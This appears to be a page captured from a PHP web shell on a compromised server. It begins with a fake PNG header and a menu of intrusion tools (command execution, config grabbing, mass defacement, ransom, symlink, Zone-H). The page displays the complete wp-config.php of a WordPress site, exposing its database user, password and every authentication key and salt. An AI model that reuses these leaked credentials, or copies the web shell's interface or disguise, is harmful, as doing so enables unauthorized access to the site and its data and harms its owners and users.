\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/egeantrepo/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/egeantrepo/wp-config.php |
<?php
define( 'WP_CACHE', true ); // Added by WP Rocket
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'egeantrepo' );
/** MySQL veritabanı kullanıcısı */
define( 'DB_USER', 'yedekledb24' );
/** MySQL veritabanı parolası */
define( 'DB_PASSWORD', 'quiChahfa3choot' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'T]r*38fjd|!8vjOCKL5y)H>xr,!%M*_*nv@PTR>e6~_l1wsE,u6oWVg)E)7A~q=6' );
define( 'SECURE_AUTH_KEY', '-/jX+tI@r5AKy]C9F$F9nLUgmv</#zj/-mN?=ckAW j{?u@.PNXp-Fp#SL~_T)0Q' );
define( 'LOGGED_IN_KEY', 'D}2YRBqKW,3hyXhb:%a*-=mjlqTh86R@`}t5*VK{piWVYT8 CSEI5p_RCwspe0' );
define( 'NONCE_KEY', '?RjQ]pdzcAiZn3SP*9 IGk!VTvl2h]$f.n#:jka/|1=E-,UP}D;Db0ylbC$Z06%-' );
define( 'AUTH_SALT', 'E/zj:H3etWcwW,RZE.Jiw=Hh{?g5=PV3_K6wI^a;-FMr=xR*j?0%KHe0l=-/Q;cu' );
define( 'SECURE_AUTH_SALT', 'Rf `PqAkxe%AQ4yN{TvX<US&v/{IBLk(qFK]!TnS5mYsFTOmd1C):_%O]e3r.O~B' );
define( 'LOGGED_IN_SALT', 'B%3nU|h;8`*/F4{tVJ w$g5XFYa(WdQkGnc$n&A[<w`&LWulQ8>x}Wle_,uF?-t&' );
define( 'NONCE_SALT', '.D3,Rl{{o-M C`}/4mgv}.wg<ti*Ev!ltjpX[%}p//#)$j#&#wQs7 XF=bjx188e' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';